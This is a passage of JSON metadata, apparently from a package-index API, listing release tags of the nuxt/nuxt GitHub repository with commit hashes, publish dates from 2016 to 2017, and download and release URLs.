https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc52866